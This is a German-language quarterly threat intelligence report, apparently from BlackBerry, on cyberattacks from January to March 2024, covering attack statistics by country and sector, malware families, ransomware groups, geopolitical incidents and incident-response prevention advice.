Globaler Bedrohungsdatenbericht

Ausgabe Juni 2024

Berichtszeitraum: 1. Januar - 31. März 2024

Umsetzbare Intelligenz, die wichtig ist

Dieser Bericht ( BlackBerry ) bietet einen umfassenden Überblick über die globale Bedrohungslandschaft für den Zeitraum von Januar bis März 2024. Zu den Highlights des Berichts gehören:

Wir beobachteten über 630.000 bösartige Hashes, was einem Anstieg von über 40 Prozent pro Minute gegenüber dem vorherigen Berichtszeitraum entspricht.

Mehr erfahren imAbschnitt Total Attacks This Period.

60 Prozent aller Angriffe richteten sich gegen kritische Infrastrukturen. Davon waren 40 Prozent auf den Finanzsektor gerichtet.

Die Einzelheiten finden Sie in der Kritische Infrastruktur Abschnitt.

56 Prozent der CVEs wurden mit 7,0 oder höher eingestuft (wobei 10 die höchste Einstufung ist). CVEs wurden schnell zur Waffe in allen Formen von Malware - insbesondere Ransomware und Infostealern.

Weitere Informationen finden Sie imAbschnitt Allgemeine Schwachstellen und Gefährdungen.

Neuer Abschnitt über Ransomware: Wir haben einen neuen Abschnitt über die wichtigsten Ransomware-Gruppen auf der ganzen Welt und die aktivste Ransomware in diesem Berichtszeitraum aufgenommen.

Weitere Informationen finden Sie im Abschnitt Who's Who in Ransomware.

Die BlackBerry® Global Threat Intelligence Reports werden alle drei Monate veröffentlicht. Diese häufigen Aktualisierungen ermöglichen es CISOs und anderen wichtigen Entscheidungsträgern, sich über die neuesten Cybersecurity-Bedrohungen und -Herausforderungen in ihren Branchen und geografischen Regionen zu informieren.

Der Bericht ist das Ergebnis der Untersuchungen, Analysen und Schlussfolgerungen unseres Cyber Threat Intelligence (CTI)-Teams, unseres Incident Response (IR)-Teams und der Sicherheitsspezialisten unserer Abteilung CylanceMDR. Scrollen Sie weiter, um mehr zu erfahren, die PDF-Datei herunterzuladen oder den Kurzbericht zu lesen.

Angriffe insgesamt in diesem Zeitraum

Von Januar bis März 2024 wurden mit den Cybersecurity-Lösungen vonBlackBerry über 3.100.000 Cyberangriffe abgewehrt: Das entspricht über 37.000 abgewehrten Cyberangriffen pro Tag. Zusätzlich beobachteten wir durchschnittlich 7.500 einzelne Malware-Samples pro Tag, die auf unseren Kundenstamm abzielten.
Abbildung 1: Einzigartige Malware-Hashes pro angetroffener Minute. (*Der Zeitraum von September 2023 bis Dezember 2023 umfasste 120 Tage).

Wie Sie in diesem Bericht feststellen werden, korreliert die Gesamtzahl der Angriffe nicht notwendigerweise mit der Zahl der einzigartigen Hashes (neue Malware). Wie die Abbildungen 2 bis 6 in den nächsten beiden Abschnitten veranschaulichen, wird nicht bei jedem Angriff einzigartige Malware verwendet. Dies hängt von der Motivation des Angreifers, der Komplexität des Angriffs und dem Ziel ab - z. B. Informationsdiebstahl oder Finanzdiebstahl.

Angriffe nach Land

Angriffe gestoppt

Die folgende Abbildung 2 zeigt die fünf Länder, in denen die Cybersecurity-Lösungen von BlackBerry die meisten Cyberangriffe verhindert haben. Organisationen, die BlackBerry Lösungen in den Vereinigten Staaten nutzen, wurden in diesem Berichtszeitraum am häufigsten angegriffen. Im asiatisch-pazifischen Raum (APAC) waren Japan, Südkorea und Australien ebenfalls von einer hohen Anzahl von Angriffen betroffen, was ihnen einen Platz unter den ersten fünf Ländern einbrachte. In Lateinamerika (LATAM) wurden Kunden in Honduras stark angegriffen, was diesem Land den fünften Platz auf unserer Liste einbrachte.

 

Einzigartige Malware

In diesem Berichtszeitraum beobachtete BlackBerry einen Anstieg der neuartigen Hashes (einzigartige Malware) um mehr als 40 Prozent pro Minute im Vergleich zum Zeitraum von September bis Dezember 2023 (Abbildung 1). Abbildung 2 zeigt die fünf Länder, in denen die Cybersecurity-Lösungen von BlackBerry die höchste Anzahl einzigartiger Malware-Hashes verzeichneten, wobei die Vereinigten Staaten die größte Anzahl erhielten. Südkorea, Japan und Australien im asiatisch-pazifischen Raum behielten ihre Platzierungen aus dem letzten Dreimonatszeitraum bei, während Brasilien neu in die Liste aufgenommen wurde.

Abbildung 2: Gestoppte Angriffe und aufgefundene Malware, geordnet nach Ländern.
Wenn Sie die Abbildungen 3a und 3b vergleichen, werden Sie feststellen, dass die Anzahl der abgewehrten Angriffe nicht unbedingt mit der Anzahl der aufgezeichneten eindeutigen Hashes korreliert. Einzigartige, benutzerdefinierte Tools und Taktiken können von einem Bedrohungsakteur mit hohen Ressourcen entwickelt werden, der ein spezifisches, hochwertiges Ziel wie den Finanzvorstand eines bestimmten Unternehmens angreifen möchte. Deepfakes werden zunehmend eingesetzt, um bestimmte Opfer anzugreifen, z. B. mit einer gefälschten Stimmaufnahme eines CEO, um den Finanzchef des Unternehmens zu einer Geldüberweisung zu bewegen.
Abbildung 3a: Gestoppte Angriffe, geordnet nach den fünf Ländern, die in diesem Berichtszeitraum am stärksten betroffen waren, im Vergleich zum vorherigen Bericht.
Abbildung 3b: Eindeutige Hashes, geordnet nach den in diesem Berichtszeitraum am stärksten betroffenen Ländern, im Vergleich zum vorherigen Bericht.

Wie wir in den nächsten Abschnitten sehen werden, können andere Angreifer die physische Infrastruktur, z. B. eines öffentlichen Versorgungsunternehmens, schädigen wollen, indem sie eine Schwachstelle in den Kontrollsystemen ausnutzen oder ein Gerät im Netzwerk infizieren

Angriffe nach Branchen

Wie in unserem letzten Bericht haben wir mehrere Schlüsselindustrien in zwei übergeordneten Abschnitten zusammengefasst: Kritische Infrastrukturen und Wirtschaftsunternehmen.

Kritische Infrastrukturen werden von der Agentur für Cybersicherheit und Infrastruktursicherheit (CISA) definiert und umfassen 16 Sektoren, darunter Gesundheitswesen, Regierung, Energie, Landwirtschaft, Finanzen und Verteidigung.

Die zunehmende Digitalisierung dieser Sektoren bedeutet, dass ihre Vermögenswerte anfälliger für Cyberkriminelle sind. Bedrohungsakteure nutzen kritische Systeme aktiv über Schwachstellen wie Systemfehlkonfigurationen und Social-Engineering-Kampagnen gegen Mitarbeiter aus.

Zu den Wirtschaftsunternehmen gehören die verarbeitende Industrie, Investitionsgüter, gewerbliche und freiberufliche Dienstleistungen sowie der Einzelhandel. Unternehmen sind immer ein verlockendes Ziel für Cyberangriffe, und die zunehmende Nutzung von vernetzten Geräten und Cloud Computing hat es einfacher gemacht, in ihre Systeme einzudringen. Die Angreifer sind auch immer raffinierter geworden und nutzen häufig Social Engineering, um an Zugangsdaten zu gelangen und Malware zu verbreiten.

Abbildung 4: Gestoppte branchenspezifische Angriffe im Vergleich zu einzigartiger Malware.

Cyber Story Highlight: Internationale Banken

Mexikanische Banken und Kryptowährungsplattformen im Visier von AllaKore RAT

Im Januar deckten die Cyberbedrohungsanalysten von BlackBerry eine lang laufende, finanziell motivierte Kampagne auf, die mit dem AllaKore RAT, einem modifizierten Open-Source-Tool für den Fernzugriff, auf mexikanische Banken und Kryptowährungshandelsplattformen abzielte. Die Bedrohungsakteure benutzten Köder, die das mexikanische Sozialversicherungsinstitut (IMSS) und legitime Dokumente imitierten, um die Benutzer während des Installationsprozesses abzulenken und ihnen zu ermöglichen, Bankdaten und Authentifizierungsinformationen zu stehlen. Diese Kampagne läuft seit 2021 und konzentriert sich auf große mexikanische Unternehmen mit einem Umsatz von mehr als 100 Millionen Dollar. BlackBerry Die Ergebnisse der Studie legen nahe, dass der Bedrohungsakteur wahrscheinlich in Lateinamerika ansässig ist, da die IPs von Mexico Starlink und die spanischsprachigen Anweisungen in der RAT-Nutzlast verwendet werden. Lesen Sie den vollständigen Artikel in unserem Blog, um mehr zu erfahren.

Bedrohungen für kritische Infrastrukturen

Ausgehend von unseren internen Telemetriedaten waren von den branchenspezifischen Cyberangriffen auf die Cybersecurity-Lösungen von BlackBerry 60 Prozent gegen kritische Infrastrukturen gerichtet. Darüber hinaus zielten 32 Prozent der einzelnen Malware-Hashes auf Mieter kritischer Infrastrukturen ab.

CylanceENDPOINT und andere Cybersecurity-Lösungen von BlackBerry haben mehr als 1,1 Millionen Angriffe auf kritische Industriesektoren abgewehrt, darunter das Finanzwesen, das Gesundheitswesen, Behörden und Versorgungsunternehmen. Fast die Hälfte dieser 1,1 Millionen Angriffe betraf den Finanzsektor. Darüber hinaus waren Organisationen im Regierungs- und öffentlichen Sektor von der größten Vielfalt an Angriffen betroffen, wobei über 36 Prozent der eindeutigen Hashes auf diesen Sektor abzielten.

Abbildung 5: Aufschlüsselung der abgewehrten Angriffe und der einzelnen Schadprogramme, die auf kritische Infrastrukturen abzielen.


BlackBerry Telemetrie wurden mehrere verbreitete Malware-Familien erfasst, die auf kritische Infrastrukturen rund um den Globus abzielen. So wurde beispielsweise der berüchtigte Infostealer LummaStealer beobachtet, der speziell auf die Lebensmittel- und Agrarindustrie in Lateinamerika und den Energiesektor in der APAC-Region abzielt. Zu den bemerkenswerten Bedrohungen, die in diesem Berichtszeitraum beobachtet wurden, gehören:

  • 8Base Ransomware: Ransomware-Einsatz | Gesundheitssektor
  • Amadey (Amadey Bot): Multifunktionales Botnetz | Regierungseinrichtungen
  • Buhti: Ransomware-Einsatz | Gewerbeimmobilien
  • LummaStealer (LummaC2): C-basierter Infostealer | Lebensmittel- und Agrarsektor (LATAM) und Energiesektor (APAC)
  • PrivateLoader: Downloader-Familie | Energiewirtschaft
  • Remcos (RemcosRAT): Kommerzielles Fernzugriffstool (RAT) | Lebensmittel- und Agrarsektor
  • Vidar (VidarStealer): Commodity infostealer | Verschiedene Sektoren:
    • Der Energiesektor in den APAC-Ländern
    • Der IT-Sektor in den LATAM-Ländern
    • Der Finanzdienstleistungssektor in Nordamerika
    • Der Sektor der staatlichen Einrichtungen in Europa, dem Nahen Osten und Afrika (EMEA)

Einzelheiten zu diesen Bedrohungen für kritische Infrastrukturen finden Sie im Anhang.

Abbildung 6: Häufigste Bedrohungen kritischer Infrastrukturen nach Regionen.


Externe Bedrohungen für kritische Infrastrukturen

Externe Bedrohungen sind Cyberangriffe, die außerhalb der internen Telemetrie von BlackBerryaufgezeichnet werden. Im letzten Berichtszeitraum gab es in der globalen Bedrohungslandschaft eine Reihe bemerkenswerter Angriffe auf kritische Infrastrukturen.

Der Einbruch beim Idaho National Laboratory (INL), einer Forschungseinrichtung des US-Energieministeriums (DOE), der Ende 2023 stattfand, hat weitere Auswirkungen. Angreifer drangen in die Cloud-basierte Personalverwaltungsplattform Oracle HCM des Labors ein und erbeuteten die persönlichen Daten von über 45.000 Personen. Die Hacktivistengruppe SiegedSec bekannte sich in den darauffolgenden Wochen zu dem Angriff und veröffentlichte einen Teil der gestohlenen Daten in einem Online-Leak-Forum. Abbildung 7 zeigt eine Zeitleiste mit bemerkenswerten Bedrohungen gegen kritische Infrastrukturen, die sich im Berichtszeitraum ereigneten.

Abbildung 7: Bemerkenswerte externe Angriffe auf kritische Infrastrukturen.

Cyber Story Highlight: Infrastruktur, VPNs und Zero Trust

Dringlichkeitsrichtlinie zeigt, dass es an der Zeit sein könnte, VPNs zu ersetzen

Die Kernfunktionalität virtueller privater Netzwerke (VPNs) ist seit ihrer Einführung im Jahr 1996 weitgehend unverändert geblieben, aber die jüngsten Sicherheitsverletzungen und Regierungsrichtlinien legen nahe, dass es an der Zeit sein könnte, ihre Verwendung zu überdenken.

Ein zentrales Problem ist das "Trust but Verify"-Modell von VPNs, das Nutzern innerhalb des Netzwerks Vertrauen entgegenbringt und sie damit anfällig für Cyberangriffe macht. Um auf dieses Risiko hinzuweisen, hat die Cybersecurity and Infrastructure Security Agency (CISA) kürzlich Notfallrichtlinien herausgegeben, die sich mit kritischen VPN-Schwachstellen befassen und zur schnellen Abschaltung gefährdeter Produkte auffordern. Lesen Sie die ganze Geschichte in unserem Blog.

Bedrohungen für kommerzielle Unternehmen

Genauso wie Branchen von Bedrohungen der Cybersicherheit betroffen sind, haben auch einzelne Unternehmen mit Cyberangriffen zu kämpfen, zumal sie sich in den Bereichen Finanzen, Kommunikation, Vertrieb, Beschaffung und anderen Geschäftsabläufen zunehmend auf digitale Infrastrukturen stützen. Von Start-ups bis hin zu multinationalen Konzernen ist alles anfällig für Cyberbedrohungen, insbesondere Ransomware.

Im letzten Berichtszeitraum blockierten die Cybersecurity-Lösungen von BlackBerry 700.000 Angriffe auf Branchen im Unternehmenssektor.

Ausgehend von unserer internen Telemetrie verzeichneten die Handelsunternehmen im Vergleich zum vorangegangenen Berichtszeitraum einen Anstieg:

  • die Zahl der Angriffe, denen sie ausgesetzt waren, stieg um zwei Prozent.
  • einen 10-prozentigen Anstieg der Anzahl der gefundenen Hashes.
Abbildung 8: Abgewehrte Angriffe und einzigartige Malware im Bereich der kommerziellen Unternehmen.


Kommerzielle Unternehmen sind mit Bedrohungen durch Infostealer konfrontiert, die über Malware-as-a-Service (MaaS)-Operationen verkauft werden. Oft wird bei diesen Bedrohungen zusätzliche Malware auf dem Gerät des Opfers installiert. Sie entwickeln sich in einem Cyber-Wettrüsten weiter, um Sicherheitsprodukte und herkömmliche Antiviren-Software (AV) zu umgehen. Zu der in der Telemetrie von BlackBerry festgestellten weit verbreiteten Malware gehören:

  • RedLine (RedLine Stealer): Infostealer
  • SmokeLoader: Weit verbreitete und vielseitige Malware
  • PrivateLoader: Vermittler von Malware
  • RaccoonStealer: MaaS Infostealer
  • LummaStealer (LummaC2): Malware-Infostealer

Einzelheiten zu diesen Bedrohungen für Wirtschaftsunternehmen finden Sie im Anhang.

Abbildung 9: Verbreitete Bedrohungen für kommerzielle Unternehmen nach Region.


Externe Bedrohungen für Wirtschaftsunternehmen

Ransomware ist eine weit verbreitete Geißel für Organisationen aller Größen und Geschäftsausrichtungen. Zu den jüngsten Beispielen für Ransomware-Angriffe gehören:

  • Die VF Corporation - ein US-amerikanischer Hersteller bekannter Sportbekleidungsmarken wie Timberland, The North Face und Vans - wurde im Dezember 2023 Opfer eines Ransomware-Angriffs durch die ALPHV-Ransomware-Bande. Die Angreifer stahlen die Daten von über 35 Millionen Kunden, was zu Verzögerungen bei der Auftragsabwicklung und anderen Störungen während der wichtigen Weihnachtszeit führte.
  • Coop Värmland, eine schwedische Supermarktkette, wurde durch einen Ransomware-Angriff der Cactus-Ransomware-Bande in ihrer geschäftigen Urlaubszeit gestört.
  • Ein bekannter deutscher Hersteller, ThyssenKrupp, erlitt im Februar 2024 einen Einbruch in seiner Automobilsparte. Das Unternehmen erklärte später, dass es sich um einen fehlgeschlagenen Ransomware-Angriff handelte.
  • Im März griff die Ransomware-Gruppe Stormous die belgische Brauerei Duvel Moortgat an, einen Hersteller von mehr als 20 Biermarken, und stahl 88 GB an Daten.

Das Who is Who der Ransomware-Branche

Wie die oben genannten Ereignisse zeigen, war Ransomware eine weit verbreitete Bedrohung im BlackBerry Global Threat Intelligence Report. Für diesen Bericht haben wir einen Abschnitt speziell über Ransomware-Gruppen eingeführt, die in diesem Berichtszeitraum aktiv waren.

Ransomware ist ein universelles Werkzeug, das von Cyberkriminellen und organisierten Syndikaten gleichermaßen eingesetzt wird und Opfer in allen Branchen rund um den Globus ins Visier nimmt. Die meisten dieser Gruppen sind finanziell motiviert. Sie passen schnell neue Taktiken und Techniken an, um herkömmliche Cybersicherheitsmaßnahmen zu umgehen, und nutzen rasch neue Sicherheitslücken aus.

Ransomware zielt zunehmend auf Organisationen des Gesundheitswesens ab, ein besorgniserregender Trend. Das Gesundheitswesen ist ein profitabler Sektor für Ransomware-Gruppen aufgrund der zunehmenden Digitalisierung von Gesundheitsakten und der schwerwiegenden Folgen, die auftreten können, wenn diese Dienste unterbrochen werden. Diese aggressiven Syndikate, die in diesem Berichtszeitraum weltweit bemerkenswerte Angriffe durchgeführt haben, können Leben gefährden und den Zugang von Mitarbeitern des Gesundheitswesens zu den wichtigen personenbezogenen Daten der Patienten einschränken oder unterbinden. 

Angriffe auf das Gesundheitswesen können schwerwiegende Auswirkungen haben, indem sie Krankenhäuser, Kliniken, Apotheken und Arzneimittelausgabestellen lahmlegen, Patienten daran hindern, lebenswichtige Medikamente zu erhalten, die Umleitung von Krankenwagen veranlassen und die Planung medizinischer Verfahren stören. Zu den sekundären Auswirkungen gehören Datenverluste und der Verkauf sensibler Patienteninformationen im Dark Web. Aus diesem Grund gehen wir davon aus, dass das Gesundheitswesen auch im Jahr 2024 weiterhin stark ins Visier der Öffentlichkeit und der Privatwirtschaft geraten wird.

Die wichtigsten Ransomware-Akteure in diesem Berichtszeitraum

Nachfolgend finden Sie die wichtigsten Ransomware-Bedrohungsgruppen aus aller Welt, die im Berichtszeitraum aktiv waren:

Abbildung 10: Bemerkenswerte Ransomware-Gruppen/Familien, die von Januar bis März 2024 aktiv sind.


Hunters International
Hunters International, ein Ransomware-as-a-Service (RaaS) Verbrechersyndikat, das seit Ende 2023 aktiv ist, wurde Anfang 2024 bekannt. Die Gruppe ist möglicherweise eine Abspaltung der
Ransomware-Gruppe Hive, die Anfang 2023 von den Strafverfolgungsbehörden zerschlagen wurde. Diese Gruppe wendet ein doppeltes Erpressungsschema an, bei dem zunächst die Daten des Opfers verschlüsselt werden, um Lösegeld zu erpressen, und anschließend mehr Geld gefordert wird, indem damit gedroht wird, die gestohlenen Daten öffentlich zu veröffentlichen. Hunters International ist derzeit rund um den Globus aktiv.

8Base
Die Ransomware-Gruppe 8Base wurde erstmals im Jahr 2022 beobachtet und erlangte Ende 2023 große Bekanntheit. Diese produktive Gruppe verwendet eine Vielzahl von Taktiken, Techniken und Verfahren (TTPs) und kann sehr opportunistisch sein. Die Gruppe nutzt oft schnell neu entdeckte Schwachstellen aus und setzt verschiedene Ransomware ein, darunter
Phobos

LockBit
LockBit, eine in Russland ansässige Ransomware-Gruppe, ist auf die Bereitstellung von RaaS durch ihre gleichnamige Malware spezialisiert. Die im Jahr 2020 entdeckte
LockBit-Ransomware hat sich zu einer der aggressivsten Ransomware-Gruppen entwickelt. Zu den Aspekten gehören:

  • Benutzerdefinierte Tools, um die Daten der Opfer vor der Verschlüsselung zu exfiltrieren und über eine undichte Stelle im Dark Web zu hosten.
  • Zielt in erster Linie auf Opfer in Nordamerika und in zweiter Linie in Lateinamerika ab.
  • Setzt eine doppelte Erpressungsstrategie ein.

Im Februar 2024 wurde der Betrieb von LockBit durch die Operation Cronos, eine internationale Strafverfolgungsmaßnahme, unterbrochen. LockBit scheint sich seitdem jedoch erholt zu haben und bleibt ein wichtiger Akteur im Bereich Ransomware.

Play
Play wurde erstmals im Jahr 2022 beobachtet und ist eine Ransomware-Gruppe, die gestohlene Daten auf TOR-basierten Seiten hostet, die eine anonyme Kommunikation ermöglichen, und damit droht, dass die Daten geleakt werden, wenn das Lösegeld nicht gezahlt wird. Play zielt häufig auf kleine und mittlere Unternehmen (KMU) ab, hauptsächlich in Nordamerika, aber auch in der EMEA-Region während des Berichtszeitraums. Die Gruppe nutzt vor allem Standard-Tools wie Cobalt Strike, Empire und Mimikatz für die Entdeckung und für TTPs für seitliche Bewegungen. Die Gruppe nutzte auch Grixba, ein kundenspezifisches Aufklärungs- und Infostealing-Tool, das vor der Ausführung von Ransomware eingesetzt wird.

BianLian
BianLian ist eine auf GoLang basierende Ransomware, die seit 2022 im Umlauf ist. Die zugehörige Gruppe war im Berichtszeitraum aktiv und hatte es vor allem auf Opfer in Nordamerika abgesehen. Wie viele Ransomware-Gruppen nutzt auch
BianLian kürzlich bekannt gewordene Schwachstellen aus und zielt oft auf kleinere Unternehmen in verschiedenen Branchen ab. BianLian nutzt verschiedene Standard-Tools wie PingCastle, Advance Port Scanner und SharpShares, um auf einem Zielsystem Fuß zu fassen, bevor es sensible Daten ausspäht und Ransomware ausführt. Diese gestohlenen Daten werden dann als Erpressungstaktik eingesetzt, bis das Lösegeld gezahlt wird.

ALPHV
ALPHV, oft auch als
BlackCat oder Noberus bezeichnet, ist eine RaaS-Operation, die es seit Ende 2021 gibt. Die Bedrohungsgruppe, die hinter ALPHV steht, ist hoch entwickelt und nutzt die Programmiersprache Rust, um Windows-, Linux- und VMWare-basierte Betriebssysteme anzugreifen. ALPHV hat es in der Regel auf nordamerikanische Opfer abgesehen.

Cyber Story Highlight: Ransomware und Gesundheitswesen

12 Tage ohne Einnahmen: Ransomware-Fallout setzt sich im Gesundheitswesen fort

Im März wurde der Gesundheitssektor von einem "beispiellosen" Ransomware-Angriff heimgesucht, der nach Angaben der American Hospital Association (AHA) den Betrieb von Krankenhäusern und Apotheken unterbrochen hat. Der Angriff auf Change Healthcare, das jährlich 15 Milliarden Transaktionen im Gesundheitswesen abwickelt, hatte schwerwiegende Auswirkungen auf die Patientenversorgung, z. B. auf die klinische Entscheidungshilfe und den Apothekenbetrieb. Diese Unterbrechung führte zu einem 12-tägigen Umsatzstillstand für die betroffenen Arztpraxen und ließ die Patienten in Schwierigkeiten geraten, an lebenswichtige Rezepte zu gelangen. Das Büro für Bürgerrechte des US-Gesundheitsministeriums untersucht den Vorfall, und die neuesten Daten zeigen, dass die Zahl der Cyber-Bedrohungen erheblich gestiegen ist: In den letzten fünf Jahren gab es einen Anstieg von 256 % bei großen Hackerangriffen. Der Vorfall unterstreicht den dringenden Bedarf an verbesserten Cybersicherheitsmaßnahmen im Gesundheitswesen. Eine ausführliche Untersuchung dieses dringenden Themas finden Sie in unserem Blog.

Geopolitische Analyse und Kommentare

Geopolitische Konflikte sind zunehmend die Ursache von Cyberangriffen. Digitale Technologien können mächtige Werkzeuge für das Gute sein, aber sie können auch von staatlichen und nichtstaatlichen Akteuren missbraucht werden. In den ersten drei Monaten des Jahres 2024 wurden Gesetzgeber in ganz Europa, Nordamerika und im asiatisch-pazifischen Raum Opfer von gezielten Spionagekampagnen. Bedrohungsakteure drangen in die IT-Systeme mehrerer Regierungsbehörden ein, kompromittierten militärische Systeme und störten kritische Infrastrukturen auf der ganzen Welt.

Die Motive für diese Eingriffe sind zwar oft komplex und undurchsichtig, aber die bedeutendsten Vorfälle der letzten Zeit betrafen wichtige geopolitische Konflikte wie die russische Invasion in der Ukraine, die zunehmende Aggression zwischen Israel und dem Iran und die anhaltenden Spannungen im Südchinesischen Meer und im indopazifischen Raum.

In der Ukraine geht die Cyberdimension des Krieges weiter. Entgegen den internationalen Normen für rechtmäßiges Verhalten im Cyberspace wird bei den gegen die Ukraine gerichteten Angriffen weiterhin nicht zwischen ziviler und militärischer Infrastruktur unterschieden. Im Januar zapften russische Agenten Webcams von Wohnhäusern in Kiew an, um angeblich Informationen über die Luftabwehrsysteme der Stadt zu sammeln, bevor sie einen Raketenangriff auf die Stadt starteten. Berichten zufolge manipulierten die Angreifer die Kameraperspektiven, um Informationen über nahegelegene kritische Infrastrukturen zu sammeln und so den Raketenangriff zu präzisieren.

Russische Cyberbedrohungsakteure wurden auch mit einem Angriff auf den größten ukrainischen Mobilfunkanbieter Kyivstar in Verbindung gebracht, bei dem wichtige Infrastrukturen zerstört und der Zugang zu 24 Millionen Kunden in der Ukraine unterbrochen wurde. Dieser Angriff erfolgte nur wenige Stunden vor dem Treffen von Präsident Biden mit Präsident Zelenskyy in Washington D.C. Auch Abgeordnete in der EU entdeckten, dass ihre Telefone mit Spionageprogrammen infiziert waren. Viele dieser Abgeordneten waren Mitglieder des Unterausschusses für Sicherheit und Verteidigung des Europäischen Parlaments, der für Empfehlungen zur EU-Unterstützung für die Ukraine zuständig ist. Im März fingen russische Angreifer auch Gespräche zwischen deutschen Militärbeamten über eine mögliche militärische Unterstützung der Ukraine ab, was die Notwendigkeit unterstreicht, die Kommunikation vor zunehmenden Spionageversuchen zu schützen.

Mit der Eskalation der militärischen Aktivitäten zwischen Iran und Israel sind auch die Cyberangriffe auf israelische Regierungsseiten gestiegen. Als Vergeltung legten israelische Bedrohungsakteure 70 Prozent der Tankstellen in ganz Iran lahm. Unterdessen starteten die USA einen Cyberangriff auf ein iranisches Militärspionageschiff im Roten Meer, das Informationen an Houthi-Rebellen weitergab.

In der indo-pazifischen Region häufen sich die Cyberangriffe und Spionagekampagnen, die chinesischen Gruppen zugeschrieben werden. Das U.S. Department of Homeland Security's Cyber Safety Review Board veröffentlichte einen umfangreichen Bericht über den Microsoft Online Exchange Incident vom Sommer 2023 und dokumentierte detailliert, wie Angreifer mit chinesischem Hintergrund Quellcode von Microsoft stahlen. Die Bedrohungsgruppe Storm-0558 kompromittierte Mitarbeiter und Beamte des US-Außenministeriums, des US-Handelsministeriums, des US-Repräsentantenhauses und mehrerer britischer Regierungsstellen. Dem Bericht zufolge gelang es den Angreifern, rund 60.000 E-Mails allein aus dem Außenministerium herunterzuladen.

Dies war kein Einzelfall. Im März 2024 deckten das US-Justizministerium und das FBI auf, dass chinesische Angreifer es auf mehrere britische, EU-, US-amerikanische und kanadische Mitglieder der Interparlamentarischen Allianz für China abgesehen hatten.

Wie bereits erwähnt, haben die Angriffe auf kritische Infrastrukturen zugenommen, insbesondere im Finanz- und Gesundheitssektor. In den ersten drei Monaten des Jahres 2024 führte eine massive Datenpanne bei einer französischen Krankenkasse zum Verlust sensibler persönlicher Daten. In Kanada schaltete das Financial Transactions and Reports Analysis Center (FINTRAC) seine Systeme nach einem Cybervorfall ab. Als Reaktion darauf stellte die kanadische Regierung 27 Millionen CAN$ zur Verfügung, um die Cyber-Resilienz von FINTRAC zu verbessern und Datensicherheitsvorkehrungen zu schaffen.

Angesichts der zunehmenden Cyberspionage und Cyberangriffe investieren Regierungen auf der ganzen Welt in die Verbesserung der Cybersicherheit. Kanada kündigte kürzlich Investitionen in historischer Höhe in seine Cyberabwehr an, und das Vereinigte Königreich erhöhte seine Verteidigungsausgaben auf 2,5 Prozent des BIP. Die Cybersicherheit bleibt eines der größten Risiken für Regierungen und Akteure des privaten Sektors gleichermaßen, und dieser Trend wird sich wahrscheinlich fortsetzen, solange die geopolitischen Spannungen weiter zunehmen.

Beobachtungen zur Reaktion auf Vorfälle

Die Reaktion auf Vorfälle (Incident Response, IR) ist ein Ansatz auf Unternehmensebene zur Bewältigung von Cyberangriffen und Vorfällen im Bereich der Cybersicherheit. Ziel der Reaktion auf Vorfälle ist es, den durch eine Sicherheitsverletzung verursachten Schaden schnell einzudämmen und zu minimieren sowie die Wiederherstellungszeit und -kosten zu reduzieren. Jedes Unternehmen braucht einen IR-Plan und einen internen oder externen IR-Dienst. BlackBerry® Cybersecurity Services - bietet schnelle Reaktionspläne, um die Auswirkungen von Cyberangriffen zu mindern und sicherzustellen, dass die digitale Wiederherstellung nach bewährten Verfahren erfolgt.
Abbildung 11: BlackBerry Aufschlüsselung des IR-Engagements.


Beobachtungen des BlackBerry Incident Response Teams

Dies ist eine Zusammenfassung der Arten von IR-Einsätzen, auf die das Team von BlackBerry reagiert hat, sowie der Sicherheitsmaßnahmen, die Unternehmen ergreifen können, um solche Verstöße zu verhindern.

  • Eindringen in das Netzwerk: Vorfälle, bei denen der ursprüngliche Infektionsvektor ein anfälliges, dem Internet zugewandtes System war, z. B. ein Webserver oder eine VPN-Anwendung (Virtual Private Network). In einigen Fällen führte der Einbruch zur Bereitstellung von Ransomware in der Umgebung des Ziels und zur Exfiltration von Daten.
    • Vorbeugung: Führen Sie rechtzeitig Sicherheitsupdates für alle dem Internet ausgesetzten Systeme durch. (MITRE - External Remote Services, T1133.)
  • Insider-Fehlverhalten: Ein derzeitiger und/oder ehemaliger Mitarbeiter hat ohne Genehmigung auf Unternehmensressourcen zugegriffen.  
    • Prävention: Einführung strenger Sicherheitskontrollen für die Authentifizierung auf allen Systemen. Implementieren Sie formelle Verfahren zur Entlassung von Mitarbeitern aus dem Unternehmen. (MITRE - Gültige Konten: Cloud-Konten, T1078.004.)
  • Ransomware: Zehn Prozent aller Vorfälle, auf die reagiert wurde, waren auf Ransomware zurückzuführen.
    • Prävention: Patchen Sie Internet-Dienste wie E-Mail, VPNs und Webserver rechtzeitig. Dies kann einen Bedrohungsakteur daran hindern, auf ein Unternehmensnetzwerk über ein anfälliges Gerät oder System zuzugreifen und weitere Maßnahmen zu ergreifen, z. B. die Verbreitung von Ransomware. (MITRE - Externe Remote-Dienste, T1133.)
    • Vorbeugung: Stellen Sie sicher, dass das Unternehmen über zwei Kopien aller wichtigen Daten verfügt, die in zwei verschiedenen Medienformaten von der ursprünglichen Datenquelle gespeichert sind, wobei mindestens eine Kopie außerhalb des Unternehmens liegen muss.

Das Erkennen, Eindämmen und Wiederherstellen eines Cyber-Sicherheitsvorfalls erfordert eine schnelle Erkennung und Reaktion, um den Schaden zu begrenzen. Es ist unerlässlich, dass Unternehmen über einen gut dokumentierten Plan für die Reaktion auf einen Vorfall sowie über geschultes Personal und Ressourcen verfügen, die bereit sind, bei den ersten Anzeichen einer potenziellen Sicherheitsverletzung sofort zu handeln. Auf diese Weise wird sichergestellt, dass Sicherheitsteams Probleme so früh wie möglich erkennen, Bedrohungen schnell eindämmen und beseitigen sowie die Auswirkungen auf den Ruf des Unternehmens und der Marke, finanzielle Verluste und rechtliche Risiken für das Unternehmen mindern können.

Bedrohungsakteure und Werkzeuge

Bedrohungsakteure

In den ersten drei Monaten des Jahres 2024 haben Dutzende von Bedrohungsgruppen Cyberangriffe durchgeführt. Wir haben die wirkungsvollsten Angriffe hier hervorgehoben.

LockBit

LockBit ist eine cyberkriminelle Gruppe mit Verbindungen nach Russland. Die Betreiber der Gruppe pflegen und verbessern fleißig ihre gleichnamige Ransomware, beaufsichtigen die Verhandlungen und orchestrieren ihren Einsatz, sobald ein erfolgreicher Einbruch stattgefunden hat. Die LockBit-Ransomware setzt eine doppelte Erpressungsstrategie ein: Sie verschlüsselt nicht nur lokale Daten, um den Zugriff des Opfers einzuschränken, sondern exfiltriert auch sensible Informationen und droht damit, sie öffentlich zu machen, wenn kein Lösegeld gezahlt wird.

